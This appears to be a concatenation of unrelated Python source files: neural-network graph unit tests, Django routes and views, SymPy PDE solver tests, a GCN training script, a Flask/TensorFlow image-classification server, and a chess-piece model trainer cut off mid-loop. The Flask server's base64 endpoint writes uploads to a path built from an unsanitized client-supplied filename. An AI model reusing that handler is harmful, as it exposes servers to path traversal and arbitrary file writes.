self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f3')
self.assertTupleEqual(prevs, ('f1', 'f2'))
def test_prevs_first(self):
''' Get prevs first layer. '''
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
prevs = self.network.prevs('c1')
self.assertTupleEqual(prevs, (None,))
prevs = self.network.prevs('c2')
self.assertTupleEqual(prevs, (None,))
def test_prevs_input(self):
''' Get prevs input layer. '''
with self.assertRaisesRegex(ValueError, 'Network: .*input.*'):
_ = self.network.prevs(self.network.INPUT_LAYER_KEY)
def test_prevs_ext_next(self):
''' Get prevs next layer of an external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('n', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0'))
prevs = self.network.prevs('n')
self.assertTupleEqual(prevs, (None, 'e0'))
def test_prevs_ext(self):
''' Get prevs external layer. '''
self.network.add_ext('e0', InputLayer(3, 3))
with self.assertRaisesRegex(ValueError, 'Network: .*ext.*'):
_ = self.network.prevs('e0')
def test_nexts(self):
''' Get nexts. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
nexts = self.network.nexts('p1')
self.assertTupleEqual(nexts, ('f1', 'f2'))
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, ('f3', 'e4'))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, ('f3',))
nexts = self.network.nexts('f3')
self.assertTupleEqual(nexts, ('e4',))
def test_nexts_last(self):
''' Get nexts first layer. '''
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, (None,))
def test_nexts_input(self):
''' Get nexts input layer. '''
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1', 'c2', 'c3'))
def test_firsts(self):
''' Get firsts. '''
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1', 'c2'))
self.assertIn('c1', firsts)
self.assertNotIn('c3', firsts)
def test_firsts_ext(self):
''' Get firsts with external layers. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('c2', ConvLayer(3, 3, 224, 1), prevs=('e0',))
self.network.add('c3', ConvLayer(67, 3, 224, 1), prevs=('e0', 'c1'))
self.network.add('c4', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0',))
firsts = self.network.firsts()
self.assertIn('c2', firsts)
self.assertNotIn('c3', firsts)
self.assertIn('c4', firsts)
def test_lasts(self):
''' Get lasts. '''
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1',))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1', 'f2'))
def test_ext_layers(self):
''' Get external layers. '''
self.assertTupleEqual(self.network.ext_layers(), tuple())
self.network.add_ext('e0', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0',))
self.network.add_ext('e1', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0', 'e1'))
def test_contains(self):
''' Whether contains. '''
self.assertIn('c1', self.network)
self.assertIn('p1', self.network)
self.assertIn('f1', self.network)
self.assertNotIn('f2', self.network)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertIn('f2', self.network)
def test_len(self):
''' Accessor len. '''
self.assertEqual(len(self.network), 3)
network = Network('test_net')
self.assertEqual(len(network), 0)
network.set_input_layer(InputLayer(3, 224))
self.assertEqual(len(network), 0)
network.add('c1', ConvLayer(3, 4, 224, 1))
self.assertEqual(len(network), 1)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertEqual(len(self.network), 4)
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.assertEqual(len(self.network), 5)
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.assertEqual(len(self.network), 6)
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_iter(self):
''' Accessor iter. '''
num = 0
for layer in self.network:
self.assertIn(layer, self.network)
self.assertIsInstance(self.network[layer], Layer)
num += 1
self.assertEqual(len(self.network), num)
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaises(StopIteration):
_ = next(iter(network))
def test_contains_ext(self):
''' Whether contains external layer. '''
self.assertNotIn('e0', self.network)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertIn('e0', self.network)
def test_len_ext(self):
''' Accessor len external layer. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertEqual(len(self.network), 3)
def test_iter_ext(self):
''' Accessor iter external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
for layer in self.network:
self.assertNotEqual(layer, 'e0')
def test_getitem(self):
''' Accessor getitem. '''
self.assertIsInstance(self.network['c1'], ConvLayer)
self.assertIsInstance(self.network['p1'], PoolingLayer)
self.assertIsInstance(self.network['f1'], FCLayer)
def test_getitem_error(self):
''' Accessor getitem. '''
with self.assertRaisesRegex(KeyError, 'Network: .*c2.*'):
_ = self.network['c2']
def test_str(self):
''' Accessor str. '''
string = str(self.network)
for layer in self.network:
self.assertIn(layer, string)
| 2.515625 | 3 |
apps/division/urls.py | Jingil-Integrated-Management/JIM_backend | 0 | 6924 | from django.urls import path
from .views import DivisionListCreateAPIView, DivisionRetrieveUpdateDestroyAPIView, MainDivisionListAPIView
urlpatterns = [
path('division/', DivisionListCreateAPIView.as_view()),
path('division/<division_pk>', DivisionRetrieveUpdateDestroyAPIView.as_view()),
path('division/main/', MainDivisionListAPIView.as_view()),
]
| 1.601563 | 2 |
sympy/solvers/tests/test_pde.py | nashalex/sympy | 8,323 | 6925 | <gh_stars>1000+
from sympy import (Derivative as D, Eq, exp, sin,
Function, Symbol, symbols, cos, log)
from sympy.core import S
from sympy.solvers.pde import (pde_separate, pde_separate_add, pde_separate_mul,
pdsolve, classify_pde, checkpdesol)
from sympy.testing.pytest import raises
a, b, c, x, y = symbols('a b c x y')
def test_pde_separate_add():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
res = pde_separate_add(eq, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x)*exp(-X(x)), D(T(t), t)*exp(T(t))]
def test_pde_separate():
x, y, z, t = symbols("x,y,z,t")
F, T, X, Y, Z, u = map(Function, 'FTXYZu')
eq = Eq(D(u(x, t), x), D(u(x, t), t)*exp(u(x, t)))
raises(ValueError, lambda: pde_separate(eq, u(x, t), [X(x), T(t)], 'div'))
def test_pde_separate_mul():
x, y, z, t = symbols("x,y,z,t")
c = Symbol("C", real=True)
Phi = Function('Phi')
F, R, T, X, Y, Z, u = map(Function, 'FRTXYZu')
r, theta, z = symbols('r,theta,z')
# Something simple :)
eq = Eq(D(F(x, y, z), x) + D(F(x, y, z), y) + D(F(x, y, z), z), 0)
# Duplicate arguments in functions
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), u(z, z)]))
# Wrong number of arguments
raises(ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(x), Y(y)]))
# Wrong variables: [x, y] -> [x, z]
raises(
ValueError, lambda: pde_separate_mul(eq, F(x, y, z), [X(t), Y(x, y)]))
assert pde_separate_mul(eq, F(x, y, z), [Y(y), u(x, z)]) == \
[D(Y(y), y)/Y(y), -D(u(x, z), x)/u(x, z) - D(u(x, z), z)/u(x, z)]
assert pde_separate_mul(eq, F(x, y, z), [X(x), Y(y), Z(z)]) == \
[D(X(x), x)/X(x), -D(Z(z), z)/Z(z) - D(Y(y), y)/Y(y)]
# wave equation
wave = Eq(D(u(x, t), t, t), c**2*D(u(x, t), x, x))
res = pde_separate_mul(wave, u(x, t), [X(x), T(t)])
assert res == [D(X(x), x, x)/X(x), D(T(t), t, t)/(c**2*T(t))]
# Laplace equation in cylindrical coords
eq = Eq(1/r * D(Phi(r, theta, z), r) + D(Phi(r, theta, z), r, 2) +
1/r**2 * D(Phi(r, theta, z), theta, 2) + D(Phi(r, theta, z), z, 2), 0)
# Separate z
res = pde_separate_mul(eq, Phi(r, theta, z), [Z(z), u(theta, r)])
assert res == [D(Z(z), z, z)/Z(z),
-D(u(theta, r), r, r)/u(theta, r) -
D(u(theta, r), r)/(r*u(theta, r)) -
D(u(theta, r), theta, theta)/(r**2*u(theta, r))]
# Lets use the result to create a new equation...
eq = Eq(res[1], c)
# ...and separate theta...
res = pde_separate_mul(eq, u(theta, r), [T(theta), R(r)])
assert res == [D(T(theta), theta, theta)/T(theta),
-r*D(R(r), r)/R(r) - r**2*D(R(r), r, r)/R(r) - c*r**2]
# ...or r...
res = pde_separate_mul(eq, u(theta, r), [R(r), T(theta)])
assert res == [r*D(R(r), r)/R(r) + r**2*D(R(r), r, r)/R(r) + c*r**2,
-D(T(theta), theta, theta)/T(theta)]
def test_issue_11726():
x, t = symbols("x t")
f = symbols("f", cls=Function)
X, T = symbols("X T", cls=Function)
u = f(x, t)
eq = u.diff(x, 2) - u.diff(t, 2)
res = pde_separate(eq, u, [T(x), X(t)])
assert res == [D(T(x), x, x)/T(x),D(X(t), t, t)/X(t)]
def test_pde_classify():
# When more number of hints are added, add tests for classifying here.
f = Function('f')
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = x**2*f(x,y) + x*f(x,y).diff(x) + x*y*f(x,y).diff(y)
eq6 = y*x**2*f(x,y) + y*f(x,y).diff(x) + f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
for eq in [eq4, eq5, eq6]:
assert classify_pde(eq) == ('1st_linear_variable_coeff',)
def test_checkpdesol():
f, F = map(Function, ['f', 'F'])
eq1 = a*f(x,y) + b*f(x,y).diff(x) + c*f(x,y).diff(y)
eq2 = 3*f(x,y) + 2*f(x,y).diff(x) + f(x,y).diff(y)
eq3 = a*f(x,y) + b*f(x,y).diff(x) + 2*f(x,y).diff(y)
for eq in [eq1, eq2, eq3]:
assert checkpdesol(eq, pdsolve(eq))[0]
eq4 = x*f(x,y) + f(x,y).diff(x) + 3*f(x,y).diff(y)
eq5 = 2*f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
eq6 = f(x,y) + 1*f(x,y).diff(x) + 3*f(x,y).diff(y)
assert checkpdesol(eq4, [pdsolve(eq5), pdsolve(eq6)]) == [
(False, (x - 2)*F(3*x - y)*exp(-x/S(5) - 3*y/S(5))),
(False, (x - 1)*F(3*x - y)*exp(-x/S(10) - 3*y/S(10)))]
for eq in [eq4, eq5, eq6]:
assert checkpdesol(eq, pdsolve(eq))[0]
sol = pdsolve(eq4)
sol4 = Eq(sol.lhs - sol.rhs, 0)
raises(NotImplementedError, lambda:
checkpdesol(eq4, sol4, solve_for_func=False))
def test_solvefun():
f, F, G, H = map(Function, ['f', 'F', 'G', 'H'])
eq1 = f(x,y) + f(x,y).diff(x) + f(x,y).diff(y)
assert pdsolve(eq1) == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=G) == Eq(f(x, y), G(x - y)*exp(-x/2 - y/2))
assert pdsolve(eq1, solvefun=H) == Eq(f(x, y), H(x - y)*exp(-x/2 - y/2))
def test_pde_1st_linear_constant_coeff_homogeneous():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = 2*u + u.diff(x) + u.diff(y)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(x - y)*exp(-x - y))
assert checkpdesol(eq, sol)[0]
eq = 4 + (3*u.diff(x)/u) + (2*u.diff(y)/u)
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(2*x - 3*y)*exp(-S(12)*x/13 - S(8)*y/13))
assert checkpdesol(eq, sol)[0]
eq = u + (6*u.diff(x)) + (7*u.diff(y))
assert classify_pde(eq) == ('1st_linear_constant_coeff_homogeneous',)
sol = pdsolve(eq)
assert sol == Eq(u, F(7*x - 6*y)*exp(-6*x/S(85) - 7*y/S(85)))
assert checkpdesol(eq, sol)[0]
eq = a*u + b*u.diff(x) + c*u.diff(y)
sol = pdsolve(eq)
assert checkpdesol(eq, sol)[0]
def test_pde_1st_linear_constant_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = -2*u.diff(x) + 4*u.diff(y) + 5*u - exp(x + 3*y)
sol = pdsolve(eq)
assert sol == Eq(f(x,y),
(F(4*x + 2*y)*exp(x/2) + exp(x + 4*y)/15)*exp(-y))
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = (u.diff(x)/u) + (u.diff(y)/u) + 1 - (exp(x + y)/u)
sol = pdsolve(eq)
assert sol == Eq(f(x, y), F(x - y)*exp(-x/2 - y/2) + exp(x + y)/3)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = 2*u + -u.diff(x) + 3*u.diff(y) + sin(x)
sol = pdsolve(eq)
assert sol == Eq(f(x, y),
F(3*x + y)*exp(x/5 - 3*y/5) - 2*sin(x)/5 - cos(x)/5)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + x*y
sol = pdsolve(eq)
assert sol.expand() == Eq(f(x, y),
x + y + (x - y)**2/4 - (x + y)**2/4 + F(x - y)*exp(-x/2 - y/2) - 2).expand()
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
assert checkpdesol(eq, sol)[0]
eq = u + u.diff(x) + u.diff(y) + log(x)
assert classify_pde(eq) == ('1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral')
def test_pdsolve_all():
f, F = map(Function, ['f', 'F'])
u = f(x,y)
eq = u + u.diff(x) + u.diff(y) + x**2*y
sol = pdsolve(eq, hint = 'all')
keys = ['1st_linear_constant_coeff',
'1st_linear_constant_coeff_Integral', 'default', 'order']
assert sorted(sol.keys()) == keys
assert sol['order'] == 1
assert sol['default'] == '1st_linear_constant_coeff'
assert sol['1st_linear_constant_coeff'].expand() == Eq(f(x, y),
-x**2*y + x**2 + 2*x*y - 4*x - 2*y + F(x - y)*exp(-x/2 - y/2) + 6).expand()
def test_pdsolve_variable_coeff():
f, F = map(Function, ['f', 'F'])
u = f(x, y)
eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
sol = pdsolve(eq, hint="1st_linear_variable_coeff")
assert sol == Eq(u, F(x*y)*exp(y**2/2) + 1)
assert checkpdesol(eq, sol)[0]
eq = x**2*u + x*u.diff(x) + x*y*u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(y*exp(-x))*exp(-x**2/2))
assert checkpdesol(eq, sol)[0]
eq = y*x**2*u + y*u.diff(x) + u.diff(y)
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(-2*x + y**2)*exp(-x**3/3))
assert checkpdesol(eq, sol)[0]
eq = exp(x)**2*(u.diff(x)) + y
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, y*exp(-2*x)/2 + F(y))
assert checkpdesol(eq, sol)[0]
eq = exp(2*x)*(u.diff(y)) + y*u - u
sol = pdsolve(eq, hint='1st_linear_variable_coeff')
assert sol == Eq(u, F(x)*exp(-y*(y - 2)*exp(-2*x)/2))
| 2.421875 | 2 |
GCN/GCN.py | EasternJournalist/learn-deep-learning | 6 | 6926 | import torch
import torch.nn.functional as F
import pandas as pd
import numpy as np
from torch_geometric.data import Data
from torch_geometric.nn import GCNConv, PairNorm
from torch_geometric.utils.undirected import to_undirected
import random
import matplotlib.pyplot as plt
data_name = 'citeseer' # 'cora' or 'citeseer'
data_edge_path = f'datasets/{data_name}/{data_name}.cites'
data_content_path = f'datasets/{data_name}/{data_name}.content'
raw_content = pd.read_table(data_content_path, header=None, dtype={0:np.str})
raw_edge = pd.read_table(data_edge_path, header=None, dtype=np.str)
paper_ids = raw_content[0]
paper_id_map = {}
for i, pp_id in enumerate(paper_ids):
paper_id_map[pp_id] = i
edge_index = torch.from_numpy(raw_edge.apply(lambda col: col.map(paper_id_map)).dropna().values).long().t().contiguous()
x = torch.from_numpy(raw_content.values[:, 1:-1].astype(np.float)).float()
labels = np.unique(raw_content[raw_content.keys()[-1]]).tolist()
y = torch.from_numpy(raw_content[raw_content.keys()[-1]].map(lambda x: labels.index(x)).values).long()
def get_mask(y:torch.tensor):
train_mask = torch.tensor([False] * y.shape[0])
for i in torch.unique(y).unbind():
temp = torch.arange(0, y.shape[0])[y == i].tolist()
random.shuffle(temp)
train_mask[temp[:30]] = True
train_mask = torch.tensor(train_mask)
test_mask = train_mask == False
return train_mask, test_mask
train_mask, test_mask = get_mask(y)
data = Data(x=x, edge_index=edge_index, y=y, train_mask=train_mask, test_mask=test_mask)
def drop_edge(edge_index, keep_ratio:float=1.):
num_keep = int(keep_ratio * edge_index.shape[1])
temp = [True] * num_keep + [False] * (edge_index.shape[1] - num_keep)
random.shuffle(temp)
return edge_index[:, temp]
class GCNNodeClassifier(torch.nn.Module):
def __init__(self,
dim_features,
num_classes,
num_layers,
add_self_loops:bool=True,
use_pairnorm:bool=False,
drop_edge:float=1.,
activation:str='relu',
undirected:bool=False
):
super(GCNNodeClassifier, self).__init__()
dim_hidden = 32
self.gconvs = torch.nn.ModuleList(
[GCNConv(in_channels=dim_features, out_channels=dim_hidden, add_self_loops=add_self_loops)]
+ [GCNConv(in_channels=dim_hidden, out_channels=dim_hidden, add_self_loops=add_self_loops) for i in range(num_layers - 2)]
)
self.final_conv = GCNConv(in_channels=dim_hidden, out_channels=num_classes, add_self_loops=add_self_loops)
self.use_pairnorm = use_pairnorm
if self.use_pairnorm:
self.pairnorm = PairNorm()
self.drop_edge = drop_edge
activations_map = {'relu':torch.relu, 'tanh':torch.tanh, 'sigmoid':torch.sigmoid, 'leaky_relu':torch.nn.LeakyReLU(0.1)}
self.activation_fn = activations_map[activation]
def forward(self, x, edge_index):
for l in self.gconvs:
edges = drop_edge(edge_index, self.drop_edge)
x = l(x, edges)
if self.use_pairnorm:
x = self.pairnorm(x)
x = self.activation_fn(x)
x = self.final_conv(x, edge_index)
return x
def eval_acc(y_pred, y):
return ((torch.argmax(y_pred, dim=-1) == y).float().sum() / y.shape[0]).item()
num_epochs = 100
test_cases = [
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# num layers
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# self loop
{'num_layers':2, 'add_self_loops':False, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# pair norm
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# drop edge
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
# activation fn
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'tanh', 'undirected':False},
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'leaky_relu', 'undirected':False},
# undirected
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.8, 'activation':'relu', 'undirected':True},
]
for i_case, kwargs in enumerate(test_cases):
print(f'Test Case {i_case:>2}')
model = GCNNodeClassifier(x.shape[1], len(labels), **kwargs)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
history_test_acc = []
input_edge_index = to_undirected(edge_index) if kwargs['undirected'] else edge_index
for i_epoch in range(0, num_epochs):
print(f'Epoch {i_epoch:>3} ', end='')
y_pred = model(x, input_edge_index)
train_acc = eval_acc(y_pred[train_mask], y[train_mask])
# Train
loss = F.cross_entropy(y_pred[train_mask], y[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Test
test_acc = eval_acc(y_pred[test_mask], y[test_mask])
history_test_acc.append(test_acc)
print(f'Train Acc = {train_acc}. Test Acc = {test_acc}')
kwargs['best_acc'] = max(history_test_acc)
plt.plot(list(range(num_epochs)), history_test_acc, label=f'case_{str(i_case).zfill(2)}')
plt.legend()
plt.savefig(f'{data_name}-HistoryAcc.jpg')
pd.DataFrame(test_cases).to_csv(f'{data_name}-Result.csv')
| 2.265625 | 2 |
esg_leipzig_homepage_2015/views.py | ESG-Leipzig/Homepage-2015 | 0 | 6927 | import datetime
import json
from django.conf import settings
from django.http import Http404
from django.utils import timezone
from django.views import generic
from .models import Event, FlatPage, News
class HomeView(generic.ListView):
"""
View for the first page called 'Home'.
"""
context_object_name = 'event_list'
model = Event
template_name = 'home.html'
def get_queryset(self):
"""
Returns a queryset of all future events that should appear on home.
Uses settings.EVENT_DELAY_IN_MINUTES to determine the range.
"""
time_to_hide = timezone.now() - datetime.timedelta(
minutes=settings.EVENT_DELAY_IN_MINUTES)
queryset = super().get_queryset().filter(begin__gte=time_to_hide)
result = []
for event in queryset:
time_to_show = timezone.now() + datetime.timedelta(
days=event.on_home_before_begin)
if event.on_home_before_begin > 0 and event.begin <= time_to_show:
result.append(event)
return result
def get_context_data(self, **context):
"""
Adds all news to the context.
"""
news_list = News.objects.all()
return super().get_context_data(news_list=news_list, **context)
class CalendarView(generic.ListView):
"""
View for a calendar with all events.
"""
model = Event
template_name = 'calendar.html'
def get_context_data(self, **context):
"""
Returns the template context. Adds event data as JSON for use in
Javascript calendar.
"""
context = super().get_context_data(**context)
event_list = []
for event in context['event_list']:
event_dict = {
'title': event.title,
'start': event.begin.isoformat(),
'description': event.content,
'className': event.css_class_name}
if event.duration:
event_dict['end'] = event.end.isoformat()
event_list.append(event_dict)
context['event_list_json'] = json.dumps(event_list)
return context
class FlatPageView(generic.DetailView):
"""
View for static pages.
"""
model = FlatPage
def get_object(self, queryset=None):
"""
Returns the flatpage instance. Raises Http404 if inexistent.
"""
queryset = queryset or self.get_queryset()
url = self.kwargs.get('url')
for flatpage in queryset.filter(slug=url.split('/')[-1]):
if flatpage.get_absolute_url().strip('/') == url:
obj = flatpage
break
else:
raise Http404
return obj
def get_template_names(self):
"""
Returns the template names for the view as list. The name
'flatpage_default.html' is always appended.
"""
template_names = []
if self.object.template_name:
template_names.append(self.object.template_name)
template_names.append('flatpage_default.html')
return template_names
def get_context_data(self, **context):
"""
Returns the template context. Adds breadcrumb to it if neccessary.
"""
context = super().get_context_data(**context)
parent = context['flatpage'].parent
if parent is None:
breadcrumb_list = []
else:
breadcrumb_list = [context['flatpage']]
while parent is not None:
breadcrumb_list.append(parent)
parent = parent.parent
breadcrumb_list.reverse()
context['breadcrumb_list'] = breadcrumb_list
return context
| 2.375 | 2 |
train.py | ronniechong/tensorflow-trainer | 0 | 6928 | <filename>train.py
from dotenv import load_dotenv
load_dotenv()
from flask import Flask, flash, request, redirect, url_for
from flask_ngrok import run_with_ngrok
from flask_cors import CORS
from werkzeug.utils import secure_filename
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.applications import vgg16
from tensorflow.keras import layers, models, Model, optimizers
from tensorflow.keras.preprocessing import image
import numpy as np
import os
import base64
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.secret_key = os.getenv('SECRETKEY')
CORS(app)
# run_with_ngrok(app)
# https://github.com/gstaff/flask-ngrok/issues/2
category_names = os.getenv('CATEGORIES').split(',')
nb_categories = len(category_names)
type = os.getenv('MODE')
if type == 'checkpoint':
# Load via checkpoints
img_height, img_width = 200,200
conv_base = vgg16.VGG16(weights='imagenet', include_top=False, pooling='max', input_shape = (img_width, img_height, 3))
layers = [
conv_base,
layers.Dense(nb_categories, activation='softmax')
]
model = models.Sequential(layers)
model.load_weights('./model/cp2-0010.ckpt')
else:
# Load saved model
model = models.load_model('./model/model_vgg16.h5')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/')
def home():
return 'Nothing to see here'
@app.route('/v2/predict', methods=['POST'])
def predictFileUpload():
if request.method == 'POST':
print(request)
if 'file' not in request.files:
return {
'Error': 'No file part'
}
file = request.files['file']
if file.filename == '':
return {
'Error': 'No selected file'
}
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join('./uploads', filename))
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
@app.route('/v1/predict', methods=['POST'])
def predictBase64():
if request.method == 'POST':
data = request.get_json()
if data is None:
return {
'Error': 'No image'
}
else:
img_data = data['image']
filename = data['name']
with open(os.path.join('./uploads', filename), "wb") as fh:
fh.write(base64.decodebytes(img_data.encode()))
# fh.close()
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0;
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
if __name__ == '__main__':
app.run(host='0.0.0.0') | 2.234375 | 2 |
src/models/train_model.py | sandorfoldi/chess_positions_recognition | 0 | 6929 | import random
import matplotlib.pyplot as plt
import wandb
import hydra
import torch
import torch.utils.data as data_utils
from model import ChessPiecePredictor
from torch import nn, optim
from google.cloud import storage
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import ImageFolder
@hydra.main(config_path="../conf", config_name="config")
def train(cfg):
print(f"Training started with parameters: {cfg}")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
wandb.init()
torch.manual_seed(cfg.seed)
model = ChessPiecePredictor(
image_size=cfg.image_size,
patch_size=cfg.patch_size,
in_channels=cfg.in_channels,
embed_dim=cfg.embed_dim,
num_heads=cfg.num_heads,
)
wandb.watch(model)
t = transforms.Compose(
[
transforms.Resize((cfg.image_size, cfg.image_size)),
transforms.Grayscale(num_output_channels=cfg.in_channels),
transforms.ToTensor(),
]
)
train_data = ImageFolder(f"{cfg.data_path}/train", transform=t)
validation_data = ImageFolder(f"{cfg.data_path}/test", transform=t)
indices_train = random.sample(range(1, 60000), 5000)
indices_valid = random.sample(range(1, 30000), 1000)
train_data = data_utils.Subset(train_data, indices_train)
validation_data = data_utils.Subset(validation_data, indices_valid)
train_loader = DataLoader(train_data, batch_size=cfg.batch_size, shuffle=True)
validation_loader = DataLoader(validation_data, batch_size=cfg.batch_size, shuffle=True)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=cfg.lr)
print("Training started...")
train_losses = []
validation_losses = []
batch_count = len(train_loader)
epochs = 2
for e in range(epochs):
train_loss = 0
train_correct = 0
validation_loss = 0
validation_correct = 0
i = 0
for images, labels in train_loader:
